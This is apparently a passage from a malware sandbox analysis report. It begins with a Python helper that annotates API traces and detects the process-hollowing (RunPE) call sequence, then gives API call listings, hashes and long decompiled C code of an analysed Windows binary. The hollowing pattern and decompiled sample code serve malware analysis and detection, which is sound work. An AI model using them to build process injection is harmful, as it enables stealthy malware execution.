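def annotate(calls: List[Call]) -> List[str]:
    """One line per call with its numeric flag arguments named."""
    out = []
    for c in calls:
        notes = [f"{p}={dec(c.args[i])}" for i, p, dec in ARG_DECODERS.get(c.name, [])
                 if i < len(c.args) and c.args[i] is not None]
        out.append(f"{c.ref}  {c.name:<20} {', '.join(notes)}")
    return out

HOLLOW_SEQUENCE = ["CreateProcess", "GetThreadContext", "WriteProcessMemory",
                   "SetThreadContext", "ResumeThread"]

def detect_hollowing(calls: List[Call]) -> List[str]:
    """RunPE / hollowing skeleton (spawn suspended, read the thread context, write into
    the child, set the context, resume): 'name @ ref' per matched step, [] if incomplete."""
    hits, step = [], 0
    for c in calls:
        if step == len(HOLLOW_SEQUENCE) or c.name.rstrip("AW") != HOLLOW_SEQUENCE[step]:
            continue
        if step == 0 and (len(c.args) < 6 or c.args[5] is None or not c.args[5] & CREATE_SUSPENDED):
            continue  # CreateProcess without CREATE_SUSPENDED: an ordinary spawn
        hits.append(f"{c.name} @ {c.ref}")
        step += 1
    return hits if step == len(HOLLOW_SEQUENCE) else []
```

annotate(parse_trace(TRACE)) yields one decoded line per call (for instance the VirtualAllocEx line reads flAllocationType=MEM_COMMIT|MEM_RESERVE, flProtect=PAGE_EXECUTE_READWRITE); detect_hollowing returns the five matched calls with their ref addresses, and [] for a trace whose CreateProcess call lacks CREATE_SUSPENDED, so the same function can be pointed at any other Joe Sandbox API listing pasted into TRACE.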

                                          APIs
                                          • GetVersionExW.KERNEL32(?,?,00000000), ref: 00DB49CD
                                            • Part of subcall function 00DB7BCC: _memmove.LIBCMT ref: 00DB7C06
                                          • GetCurrentProcess.KERNEL32(?,00E3FAEC,00000000,00000000,?,?,00000000), ref: 00DB4A9A
                                          • IsWow64Process.KERNEL32(00000000,?,00000000), ref: 00DB4AA1
                                          • GetNativeSystemInfo.KERNEL32(00000000,?,00000000), ref: 00DB4AE7
                                          • FreeLibrary.KERNEL32(00000000,?,00000000), ref: 00DB4AF2
                                          • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00DB4B23
                                          • GetSystemInfo.KERNEL32(00000000,?,00000000), ref: 00DB4B2F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: b9be08c5601e6d00e380160ee1e8e028d3dfda8ba28bfd681d4a0d21edb90485
                                          • Instruction ID: 0a4a81ed0aac39d22c126dfb76eb156dcbb9c17051f431c502aee346236a60a2
                                          • Opcode Fuzzy Hash: b9be08c5601e6d00e380160ee1e8e028d3dfda8ba28bfd681d4a0d21edb90485
                                          • Instruction Fuzzy Hash: F091C53198A7C0DEC731EB6994905EAFFF5AF2A304B4849ADD0C793A42D620E508C77D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00DB4D8E,?,?,00000000,00000000), ref: 00DB4E99
                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00DB4D8E,?,?,00000000,00000000), ref: 00DB4EB0
                                          • LoadResource.KERNEL32(?,00000000,?,?,00DB4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00DB4E2F), ref: 00DED937
                                          • SizeofResource.KERNEL32(?,00000000,?,?,00DB4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00DB4E2F), ref: 00DED94C
                                          • LockResource.KERNEL32(00DB4D8E,?,?,00DB4D8E,?,?,00000000,00000000,?,?,?,?,?,?,00DB4E2F,00000000), ref: 00DED95F
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                          • String ID: SCRIPT
                                          • API String ID: 3051347437-3967369404
                                          • Opcode ID: 41b37abcc8b5bc9cab16e9d55445e2cda15b30814cbe71823e0fe1b05fe5926a
                                          • Instruction ID: 1892fefaa55f9ddd2f0d4ae36264a0a1bd61fd7bcaddbf4010f9d29a4d6091e2
                                          • Opcode Fuzzy Hash: 41b37abcc8b5bc9cab16e9d55445e2cda15b30814cbe71823e0fe1b05fe5926a
                                          • Instruction Fuzzy Hash: FB115A75640704FFD7218BA6ED48F677BBAFBC5B11F244268F40696261DF61E8048A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: BuffCharUpper
                                          • String ID: pb$%
                                          • API String ID: 3964851224-1798441486
                                          • Opcode ID: 30fcf99c7f0c2502b0e13c65a7a238827fc04040a8ca0f671afa1d89fff6ff75
                                          • Instruction ID: 2778556907713d9b1a98d44da94e2449a683c5eb324f50699ad2e207b172bc48
                                          • Opcode Fuzzy Hash: 30fcf99c7f0c2502b0e13c65a7a238827fc04040a8ca0f671afa1d89fff6ff75
                                          • Instruction Fuzzy Hash: DB924870608341CFD724DF14C480B6ABBE5BF85304F19896DE99A9B352D771EC45CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID: Dd$Dd$Dd$Dd$Variable must be of type 'Object'.
                                          • API String ID: 0-2781164977
                                          • Opcode ID: 0163e15586bc5ded1c81e4e9fe3e1865f904fb0cbe96baf4b7b97816ba78e971
                                          • Instruction ID: b1845f2241623e4f88905550d35535de72afff30ae5be8d827a2b19c1526b152
                                          • Opcode Fuzzy Hash: 0163e15586bc5ded1c81e4e9fe3e1865f904fb0cbe96baf4b7b97816ba78e971
                                          • Instruction Fuzzy Hash: 5DA28E74A00209CFCB14CF58C880AEEB7B2FF58314F298559E956AB351D775ED86CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00E13C7A
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00E13C88
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00E13CA8
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 00E13D52
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 3243318325-0
                                          • Opcode ID: 40f30004a05abdc057f594856d22f9d866eedd172a32ba36b4a0c1dd4e7423a8
                                          • Instruction ID: 50ce3a0656d836c8cb68802c039b846fd0e77f997d7d10d82bf30309cccbafaa
                                          • Opcode Fuzzy Hash: 40f30004a05abdc057f594856d22f9d866eedd172a32ba36b4a0c1dd4e7423a8
                                          • Instruction Fuzzy Hash: CE31B471108305DFD314EF60D885AEFBBF8EF95354F50092DF482961A1EB719A89CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.938932731.0000000000DB1000.00000020.00020000.sdmp, Offset: 00DB0000, based on PE: true
                                          • Associated: 00000001.00000002.938907137.0000000000DB0000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939565216.0000000000E3F000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939707012.0000000000E64000.00000002.00020000.sdmp
                                          • Associated: 00000001.00000002.939771397.0000000000E6E000.00000004.00020000.sdmp
                                          • Associated: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ef9addcb0f6146f2372dceb743688ef481eab33b619c5fddeb2b71fd5a2ff0fe
                                          • Instruction ID: 8d2fec4ac54d42d0bfbe740365b1b53e56c1e3f5c3dbc04cb466ca6942a95f56
                                          • Opcode Fuzzy Hash: ef9addcb0f6146f2372dceb743688ef481eab33b619c5fddeb2b71fd5a2ff0fe
                                          • Instruction Fuzzy Hash: 46228B74A00219DFDB14DF58C480AFAB7F1FF08310F198169E986AB351E774A985CBB1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 91%
                                          			E00DC09D0(void* __ebx, void* __ecx, void* __fp0, signed int _a4) {
                                          				struct tagMSG _v32;
                                          				char _v48;
                                          				char _v52;
                                          				char _v56;
                                          				char _v60;
                                          				char _v68;
                                          				char _v72;
                                          				char _v96;
                                          				char _v100;
                                          				char _v104;
                                          				char _v108;
                                          				char _v112;
                                          				char _v120;
                                          				char _v124;
                                          				char _v128;
                                          				int _v136;
                                          				struct HWND__* _v140;
                                          				struct HWND__* _v148;
                                          				int _v152;
                                          				struct HWND__* _v156;
                                          				struct HWND__* _v164;
                                          				signed int _v168;
                                          				char _v172;
                                          				char _v176;
                                          				char _v180;
                                          				int* _v192;
                                          				struct tagMSG _v216;
                                          				int _v224;
                                          				intOrPtr _v228;
                                          				int _v232;
                                          				struct HWND__* _v236;
                                          				signed int _v240;
                                          				struct HWND__* _v244;
                                          				struct HWND__* _v248;
                                          				signed int _v256;
                                          				char _v257;
                                          				void* _v260;
                                          				struct HWND__* _v264;
                                          				intOrPtr _v268;
                                          				int _v272;
                                          				signed int _v276;
                                          				char _v280;
                                          				signed int _v284;
                                          				signed int _v288;
                                          				long _v292;
                                          				void* _v296;
                                          				long _v300;
                                          				void* _v304;
                                          				int _v312;
                                          				void* _v316;
                                          				struct HWND__* _v320;
                                          				void* _v324;
                                          				signed int _v328;
                                          				signed int _v332;
                                          				char _v333;
                                          				intOrPtr _v336;
                                          				void* _v340;
                                          				signed int _v344;
                                          				intOrPtr _v352;
                                          				long _v356;
                                          				struct HWND__* _v364;
                                          				void* __edi;
                                          				intOrPtr _t473;
                                          				signed int _t475;
                                          				intOrPtr _t476;
                                          				void* _t477;
                                          				intOrPtr _t478;
                                          				void* _t484;
                                          				void* _t490;
                                          				signed int _t492;
                                          				int _t494;
                                          				long _t495;
                                          				void* _t498;
                                          				void* _t520;
                                          				int _t536;
                                          				short* _t541;
                                          				int* _t542;
                                          				void** _t543;
                                          				void* _t549;
                                          				intOrPtr _t577;
                                          				void _t578;
                                          				void* _t587;
                                          				intOrPtr _t594;
                                          				void _t595;
                                          				int _t598;
                                          				void* _t599;
                                          				void* _t600;
                                          				void* _t602;
                                          				signed int _t608;
                                          				int _t609;
                                          				signed int _t613;
                                          				intOrPtr _t619;
                                          				signed int _t621;
                                          				void* _t630;
                                          				void* _t636;
                                          				int _t644;
                                          				intOrPtr _t647;
                                          				intOrPtr _t648;
                                          				intOrPtr _t649;
                                          				intOrPtr _t650;
                                          				intOrPtr _t652;
                                          				signed int _t655;
                                          				intOrPtr* _t656;
                                          				intOrPtr _t658;
                                          				intOrPtr _t659;
                                          				int _t674;
                                          				signed int _t675;
                                          				void* _t689;
                                          				int _t690;
                                          				long _t691;
                                          				void* _t703;
                                          				void* _t704;
                                          				long _t707;
                                          				short _t708;
                                          				void* _t709;
                                          				void* _t712;
                                          				void* _t733;
                                          				void* _t740;
                                          				void* _t741;
                                          				void* _t747;
                                          				signed int _t764;
                                          				void* _t769;
                                          				signed int _t778;
                                          				void* _t795;
                                          				signed int _t798;
                                          				void* _t799;
                                          				void* _t802;
                                          				intOrPtr _t805;
                                          				void* _t806;
                                          				signed int _t838;
                                          				void* _t839;
                                          				void* _t843;
                                          				void* _t846;
                                          				long _t848;
                                          				void* _t849;
                                          				intOrPtr _t850;
                                          				intOrPtr _t851;
                                          				long _t852;
                                          				signed int _t857;
                                          				void* _t863;
                                          				signed int _t864;
                                          				void* _t866;
                                          				intOrPtr* _t867;
                                          				void* _t868;
                                          				int* _t869;
                                          				void* _t870;
                                          				signed int _t873;
                                          				signed int _t874;
                                          				signed int _t876;
                                          				signed int _t877;
                                          				intOrPtr* _t879;
                                          				intOrPtr _t881;
                                          				signed int _t882;
                                          				void* _t884;
                                          				void* _t921;
                                          
                                          				_t931 = __fp0;
                                          				_t747 = __ebx;
                                          				_t884 = (_t882 & 0xfffffff8) - 0x160;
                                          				_t846 = __ecx;
                                          				_v296 = __ecx;
                                          				_t473 =  *((intOrPtr*)(__ecx + 0xec));
                                          				if(_t473 >= 0xed8) {
                                          					 *0xe75280 = 0;
                                          					_t475 = E00E19E4A(__ecx, __fp0, 0x9a, 0xffffffff) | 0xffffffff;
                                          					L56:
                                          					return _t475;
                                          				}
                                          				_t476 = _t473 + 1;
                                          				 *((intOrPtr*)(__ecx + 0xec)) = _t476;
                                          				if(_t476 == 1) {
                                          					_t477 =  *(__ecx + 0x11c);
                                          					_v300 = _t477;
                                          					while(1) {
                                          						__eflags = _t477;
                                          						if(__eflags == 0) {
                                          							goto L2;
                                          						}
                                          						_t741 = E00DB9E5D(_t846,  *_t477);
                                          						__eflags = _t741;
                                          						if(_t741 != 0) {
                                          							__eflags =  *((intOrPtr*)(_t741 + 0x10)) + 1;
                                          							E00E06349(_t846, _t837, _t931,  *((intOrPtr*)(_t741 + 0x10)) + 1, 1);
                                          						}
                                          						_t752 =  &_v300;
                                          						E00E06774(_t752,  &_v292);
                                          						_t477 = _v304;
                                          					}
                                          				}
                                          				L2:
                                          				 *((char*)(_t846 + 0x144)) = 0;
                                          				if( *((char*)(_t846 + 0xfc)) != 0) {
                                          					L53:
                                          					_t478 =  *((intOrPtr*)(_t846 + 0xec));
                                          					 *((char*)(_t846 + 0x144)) = 0;
                                          					if(_t478 == 1) {
                                          						E00DC1070(_t846);
                                          						__eflags =  *((char*)(_t846 + 0xfc)) - 1;
                                          						if(__eflags == 0) {
                                          							L55:
                                          							_t475 = 0;
                                          							goto L56;
                                          						}
                                          						E00DC1093(_t846, _t837, __eflags, _t931);
                                          						LockWindowUpdate(0);
                                          						DestroyWindow( *0xe752ac);
                                          						_t484 = GetMessageW( &_v32, 0, 0, 0);
                                          						__eflags = _t484;
                                          						if(_t484 <= 0) {
                                          							goto L55;
                                          						}
                                          						do {
                                          							TranslateMessage( &_v32);
                                          							DispatchMessageW( &_v32);
                                          							_t490 = GetMessageW( &_v32, 0, 0, 0);
                                          							__eflags = _t490;
                                          						} while (_t490 > 0);
                                          						goto L55;
                                          					}
                                          					 *((intOrPtr*)(_t846 + 0xec)) = _t478 - 1;
                                          					goto L55;
                                          				} else {
                                          					while(1) {
                                          						_t837 = 2;
                                          						if( *((char*)(_t846 + 0x144)) != 0) {
                                          							goto L53;
                                          						}
                                          						if( *0xe75281 != 0) {
                                          							__eflags =  *((char*)(_t846 + 0x145));
                                          							if(__eflags == 0) {
                                          								L11:
                                          								if( *0xe764a8 != 0) {
                                          									_t492 =  *0xe764ac; // 0x0
                                          									_t857 =  *(_t492 + 4);
                                          									_v356 =  *_t492;
                                          									L00DD0E2C(_t492);
                                          									 *0xe764a8 =  *0xe764a8 - 1;
                                          									_t884 = _t884 + 4;
                                          									 *0xe764ac = _t857;
                                          									asm("sbb esi, esi");
                                          									_t752 = 0;
                                          									 *0xe764b0 =  *0xe764b0 &  ~_t857;
                                          									_t837 =  *(_t846 + 0x1c8);
                                          									_v340 = 0;
                                          									__eflags = _t837;
                                          									if(_t837 == 0) {
                                          										L125:
                                          										__eflags = _t752 - _t837;
                                          										if(__eflags == 0) {
                                          											_t837 = 2;
                                          											goto L12;
                                          										}
                                          										_t733 = E00DB9E5D(_t846,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t846 + 0x1c4)) + _t752 * 4)))) + 8);
                                          										E00DB8047(_t846 + 0x14c,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t846 + 0x1c4)) + _v344 * 4)))) + 0x18);
                                          										_t752 = _t846;
                                          										E00DBB73C(_t752, _t837, _t931,  *((intOrPtr*)(_t733 + 0x10)) + 1, 1, 0);
                                          										L51:
                                          										L52:
                                          										if( *((char*)(_t846 + 0xfc)) == 0) {
                                          											continue;
                                          										}
                                          										goto L53;
                                          									}
                                          									_t881 =  *((intOrPtr*)(_t846 + 0x1c4));
                                          									_t852 = _v356;
                                          									do {
                                          										_t740 =  *( *(_t881 + _t752 * 4));
                                          										__eflags = _t740;
                                          										if(_t740 == 0) {
                                          											goto L123;
                                          										}
                                          										__eflags =  *_t740 - _t852;
                                          										if( *_t740 == _t852) {
                                          											break;
                                          										}
                                          										L123:
                                          										_t752 = _t752 + 1;
                                          										__eflags = _t752 - _t837;
                                          									} while (_t752 < _t837);
                                          									_t846 = _v296;
                                          									_v340 = _t752;
                                          									goto L125;
                                          								}
                                          								L12:
                                          								if( *0xe75287 == 1) {
                                          									__eflags =  *0xe75281;
                                          									if(__eflags != 0) {
                                          										goto L13;
                                          									}
                                          									Sleep(0xa);
                                          									goto L52;
                                          								}
                                          								L13:
                                          								if( *((intOrPtr*)(_t846 + 0x454)) == 0 ||  *0xe7641c != 0) {
                                          									L22:
                                          									if( *0xe757bc == 0 ||  *((char*)(_t846 + 0x458)) == 1) {
                                          										L32:
                                          										if( *((intOrPtr*)(_t846 + 0x184)) != 0) {
                                          											__eflags =  *((char*)(_t846 + 0x484)) - 1;
                                          											if(__eflags == 0) {
                                          												goto L33;
                                          											}
                                          											 *((char*)(_t846 + 0x484)) = 1;
                                          											_v264 = 0;
                                          											_v180 = 0xe3fb84;
                                          											_v344 = 0;
                                          											_v176 = 0;
                                          											_v172 = 0;
                                          											_v168 = 0;
                                          											E00E19A15( &_v128, _t846,  *((intOrPtr*)(_t846 + 0x188)));
                                          											E00E0D4F2(_t846 + 0x184);
                                          											_t871 = _v128;
                                          											_v232 = 0;
                                          											E00DB9837(E00DB9960(_t747,  &_v240,  *_v128), _t747,  *((intOrPtr*)(_t871 + 4)));
                                          											_t837 = E00DB9E5D(_t846,  *((intOrPtr*)( *((intOrPtr*)(_t871 + 4)) + 8)));
                                          											_v344 = _t837;
                                          											_t764 =  *(_t837 + 0x10);
                                          											_t520 = E00DB7068(_t764);
                                          											 *(_t846 + 0xf4) = _t764;
                                          											_t873 = 3;
                                          											__eflags =  *(_t837 + 0x14);
                                          											_v320 = _t520;
                                          											if( *(_t837 + 0x14) <= 0) {
                                          												L174:
                                          												E00DB8401(_t837,  *(_t837 + 0x10));
                                          												_t874 = 3;
                                          												_v292 = 3;
                                          												_v344 = 1;
                                          												__eflags =  *((intOrPtr*)(_v336 + 0x14)) - 1;
                                          												if(__eflags < 0) {
                                          													L215:
                                          													E00DB7DE1(_t747,  &_v48, __eflags, L"@COM_EVENTOBJ");
                                          													__eflags = _v228 - 6;
                                          													E00DB84C0(_t846,  &_v52, (0 | _v228 != 0x00000006) - 0x00000001 & _v240, 0, 1);
                                          													E00DB5904( &_v68);
                                          													E00DBB73C(_t846, _t837, _t931,  *((intOrPtr*)(_v352 + 0x10)) + 1, 0, 0);
                                          													E00DB82DF(_t747, 0xe76280);
                                          													_t769 = _v260;
                                          													__eflags = _t769;
                                          													if(_t769 != 0) {
                                          														E00DB79DD(_t769, _t769);
                                          														_v232 = 0;
                                          													}
                                          													_t536 = _v224;
                                          													__eflags = _t536 - 5;
                                          													if(__eflags < 0) {
                                          														L253:
                                          														_v224 = 1;
                                          														_v236 = 0;
                                          														E00E0617E( &_v128);
                                          														_t752 =  &_v180;
                                          														E00E0617E(_t752);
                                          														 *((char*)(_t846 + 0x484)) = 0;
                                          														goto L51;
                                          													} else {
                                          														_t608 = _t536 + 0xfffffffb;
                                          														__eflags = _t608 - 0xa;
                                          														if(__eflags > 0) {
                                          															goto L253;
                                          														}
                                          														switch( *((intOrPtr*)(_t608 * 4 +  &M00DF5CBB))) {
                                          															case 0:
                                          																__eflags = __esi;
                                          																if(__eflags != 0) {
                                          																	__ecx = __esi;
                                          																	__eax = E00DB8CD4(__ecx, __edi, __eflags, __ecx);
                                          																}
                                          																goto L253;
                                          															case 1:
                                          																goto L253;
                                          															case 2:
                                          																__eflags = __esi;
                                          																if(__eflags == 0) {
                                          																	goto L253;
                                          																}
                                          																_push(__esi);
                                          																__imp__#9();
                                          																goto L252;
                                          															case 3:
                                          																__eflags = __esi;
                                          																if(__eflags == 0) {
                                          																	goto L253;
                                          																}
                                          																__ecx = __esi + 8;
                                          																goto L251;
                                          															case 4:
                                          																__eax = L00DD0E2C( *((intOrPtr*)(__esi + 4)));
                                          																goto L252;
                                          															case 5:
                                          																__eflags = __esi;
                                          																if(__eflags != 0) {
                                          																	__ecx = __esi;
                                          																	__eax = E00E06E7A(__ecx, __ecx);
                                          																}
                                          																goto L253;
                                          															case 6:
                                          																__eflags = __esi;
                                          																if(__eflags == 0) {
                                          																	goto L253;
                                          																}
                                          																__ecx = __esi;
                                          																L251:
                                          																__eax = E00DB5904(__ecx);
                                          																L252:
                                          																__eax = L00DD0E2C(__esi);
                                          																goto L253;
                                          															case 7:
                                          																__eflags = __esi;
                                          																if(__eflags != 0) {
                                          																	__ecx = __esi;
                                          																	__eax = E00E06E8F(__ebx, __ecx, __edi, __ecx);
                                          																}
                                          																goto L253;
                                          														}
                                          													}
                                          												} else {
                                          													goto L175;
                                          												}
                                          												do {
                                          													L175:
                                          													_t838 = 0;
                                          													_v256 = 0;
                                          													_t798 =  *(_v304 + 4);
                                          													_v356 = _t798;
                                          													_t619 =  *((intOrPtr*)(_t798 + _t874 * 4));
                                          													__eflags =  *(_t619 + 8);
                                          													if( *(_t619 + 8) != 0) {
                                          														L182:
                                          														_t848 = _v356;
                                          														_t839 = 4 + _t874 * 4;
                                          														_v328 = 1;
                                          														_t799 = 0;
                                          														__eflags = 0;
                                          														_t876 = _v328;
                                          														while(1) {
                                          															_t621 =  *( *((intOrPtr*)(_t839 + _t848)) + 8) & 0x0000ffff;
                                          															__eflags = _t621 - 0x47;
                                          															if(_t621 != 0x47) {
                                          																goto L185;
                                          															}
                                          															L184:
                                          															_t799 = _t799 + 1;
                                          															L196:
                                          															_t876 = _t876 + 1;
                                          															_t839 = _t839 + 4;
                                          															_t621 =  *( *((intOrPtr*)(_t839 + _t848)) + 8) & 0x0000ffff;
                                          															__eflags = _t621 - 0x47;
                                          															if(_t621 != 0x47) {
                                          																goto L185;
                                          															}
                                          															goto L184;
                                          															L185:
                                          															__eflags = _t621 - 0x48;
                                          															if(_t621 != 0x48) {
                                          																__eflags = _t621 - 0x40;
                                          																if(_t621 != 0x40) {
                                          																	goto L196;
                                          																}
                                          																__eflags = _t799;
                                          																if(_t799 == 0) {
                                          																	L187:
                                          																	_t846 = _v296;
                                          																	_t837 = _v256;
                                          																	_v328 = _t876;
                                          																	_t876 = _v288;
                                          																	__eflags = _v340 - _v264;
                                          																	if(_v340 <= _v264) {
                                          																		__eflags = _t837;
                                          																		E00DB84C0(_t846,  *((intOrPtr*)( *((intOrPtr*)(_v356 + _t876 * 4)))),  *_v344, _t837, 1);
                                          																		goto L214;
                                          																	}
                                          																	_v324 = 0;
                                          																	_v356 = _t876 + 2;
                                          																	_v316 = 0;
                                          																	_v312 = 1;
                                          																	_t636 = E00DB9EA0(_t747, _t846, _t931, _v304,  &_v356,  &_v324, _v328 + _t876);
                                          																	__eflags = _t636;
                                          																	if(_t636 < 0) {
                                          																		_t795 = _v316;
                                          																		__eflags = _t795;
                                          																		if(_t795 != 0) {
                                          																			E00DB79DD(_t795, _t795);
                                          																			_v320 = 0;
                                          																		}
                                          																		_t609 = _v312;
                                          																		__eflags = _t609 - 5;
                                          																		if(_t609 < 5) {
                                          																			L171:
                                          																			_v312 = 1;
                                          																			_v324 = 0;
                                          																			L172:
                                          																			E00DB9C90(_t747,  &_v236);
                                          																			E00E0617E( &_v128);
                                          																			_t752 =  &_v180;
                                          																			E00E0617E(_t752);
                                          																			 *((char*)(_t846 + 0x484)) = 0;
                                          																			goto L33;
                                          																		} else {
                                          																			_t613 = _t609 + 0xfffffffb;
                                          																			__eflags = _t613 - 0xa;
                                          																			if(_t613 > 0xa) {
                                          																				goto L171;
                                          																			}
                                          																			switch( *((intOrPtr*)(_t613 * 4 +  &M00DF5CE7))) {
                                          																				case 0:
                                          																					__ecx = _v324;
                                          																					__eflags = __ecx;
                                          																					if(__eflags != 0) {
                                          																						__eax = E00DB8CD4(__ecx, __edi, __eflags, __ecx);
                                          																					}
                                          																					goto L171;
                                          																				case 1:
                                          																					goto L171;
                                          																				case 2:
                                          																					_t614 = _v324;
                                          																					__eflags = _t614;
                                          																					if(_t614 == 0) {
                                          																						goto L171;
                                          																					}
                                          																					_push(_t614);
                                          																					__imp__#9();
                                          																					_push(_v328);
                                          																					goto L170;
                                          																				case 3:
                                          																					__esi = _v324;
                                          																					__eflags = __esi;
                                          																					if(__esi == 0) {
                                          																						goto L171;
                                          																					}
                                          																					_t353 = __esi + 8; // 0x8
                                          																					__ecx = _t353;
                                          																					goto L169;
                                          																				case 4:
                                          																					_v324 = L00DD0E2C( *((intOrPtr*)(_v324 + 4)));
                                          																					_push(_v324);
                                          																					goto L170;
                                          																				case 5:
                                          																					__ecx = _v324;
                                          																					__eflags = __ecx;
                                          																					if(__ecx != 0) {
                                          																						__eax = E00E06E7A(__ecx, __ecx);
                                          																					}
                                          																					goto L171;
                                          																				case 6:
                                          																					__esi = _v324;
                                          																					__eflags = __esi;
                                          																					if(__esi == 0) {
                                          																						goto L171;
                                          																					}
                                          																					__ecx = __esi;
                                          																					L169:
                                          																					__eax = E00DB5904(__ecx);
                                          																					_push(__esi);
                                          																					L170:
                                          																					L00DD0E2C();
                                          																					_t884 = _t884 + 4;
                                          																					goto L171;
                                          																				case 7:
                                          																					__ecx = _v324;
                                          																					__eflags = __ecx;
                                          																					if(__ecx != 0) {
                                          																						__eax = E00E06E8F(__ebx, __ecx, __edi, __ecx);
                                          																					}
                                          																					goto L171;
                                          																			}
                                          																		}
                                          																	}
                                          																	E00DB84C0(_t846,  *((intOrPtr*)( *((intOrPtr*)( *(_v304 + 4) + _t876 * 4)))),  &_v324, _v256 | 0x00000200, 1);
                                          																	_t799 = _v332;
                                          																	__eflags = _t799;
                                          																	if(_t799 != 0) {
                                          																		E00DB79DD(_t799, _t799);
                                          																		_v320 = 0;
                                          																	}
                                          																	_t644 = _v312;
                                          																	__eflags = _t644 - 5;
                                          																	if(_t644 < 5) {
                                          																		L212:
                                          																		_v312 = 1;
                                          																		_v324 = 0;
                                          																		goto L214;
                                          																	} else {
                                          																		_t621 = _t644 + 0xfffffffb;
                                          																		__eflags = _t621 - 0xa;
                                          																		if(_t621 > 0xa) {
                                          																			goto L212;
                                          																		}
                                          																		switch( *((intOrPtr*)(_t621 * 4 +  &M00DF5C8F))) {
                                          																			case 0:
                                          																				__ecx = _v324;
                                          																				__eflags = __ecx;
                                          																				if(__eflags != 0) {
                                          																					__eax = E00DB8CD4(__ecx, __edi, __eflags, __ecx);
                                          																				}
                                          																				goto L212;
                                          																			case 1:
                                          																				goto L212;
                                          																			case 2:
                                          																				__eax = _v324;
                                          																				__eflags = __eax;
                                          																				if(__eax == 0) {
                                          																					goto L212;
                                          																				}
                                          																				_push(__eax);
                                          																				__imp__#9();
                                          																				_push(_v328);
                                          																				goto L211;
                                          																			case 3:
                                          																				__eax = _v324;
                                          																				_v356 = __eax;
                                          																				__eflags = __eax;
                                          																				if(__eax == 0) {
                                          																					goto L212;
                                          																				}
                                          																				_t307 = __eax + 8; // 0x8
                                          																				__ecx = _t307;
                                          																				goto L210;
                                          																			case 4:
